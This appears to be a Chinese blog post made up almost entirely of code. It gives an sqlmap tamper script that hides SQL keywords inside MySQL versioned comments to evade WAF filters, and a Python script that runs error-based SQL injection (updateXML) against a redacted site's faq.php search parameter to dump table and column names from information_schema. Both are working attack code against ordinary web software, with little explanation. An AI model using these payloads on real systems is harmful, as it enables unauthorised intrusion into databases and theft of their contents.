标签:hal code ascii not filter url python proc category
#!/usr/bin/env python import os import re from lib.core.common import singleTimeWarnMessage from lib.core.data import kb from lib.core.enums import DBMS from lib.core.enums import PRIORITY from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS __priority__ = PRIORITY.HIGHER def dependencies(): singleTimeWarnMessage("tamper script ‘%s‘ is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) def tamper(payload, **kwargs): def process(match): word = match.group(‘word‘) if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "/*!12345 %s*/" % word) else: return match.group() retVal = payload if payload: retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) retVal = retVal.replace(" /*!0", "/*!0") return retVal
#coding=utf-8 import requests import re, binascii, warnings, time warnings.filterwarnings("ignore") table_name_list = [] for k in range(1,112): #遍历表名 url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&" "searchopt=content&searchkey=1‘ /*!and*//*!updateXML*/" "(1,concat(0x7e, (select /*!table_name*/ /*!from*/ information_schema.tables limit " + str(k) + ",1),0x7e),3)-- -" "&x=4&y=23" req = requests.get(url) a = re.findall(r"‘~(.*)~‘", req.text) if a:table_name_list.append(a[0]) else:pass print table_name_list for i in table_name_list: print u"表名为:",i #输出表名 #遍历字长度 url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" "‘ /*!and*//*!updateXML*/(1,concat(0x7e, " "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!count(column_name)*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ ),0x7e),3)-- -&x=4&y=23" req = requests.get(url) b = re.findall(r"‘~(.*)~‘",req.text) if b: m = int(b[0].strip("~"))+1 print u"行数为:",m #输出行数 for n in range(1,m): #遍历字段名 url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" "‘ /*!and*//*!updateXML*/(1,concat(0x7e, " "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!column_name*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ limit "+str(n)+",1),0x7e),3)-- -&x=4&y=23" req = requests.get(url) c = re.findall(r"‘~(.*)~‘", req.text) if c:print u"字段:",str(c).strip("[u‘~").strip("~‘]") else:pass else:pass
标签:hal code ascii not filter url python proc category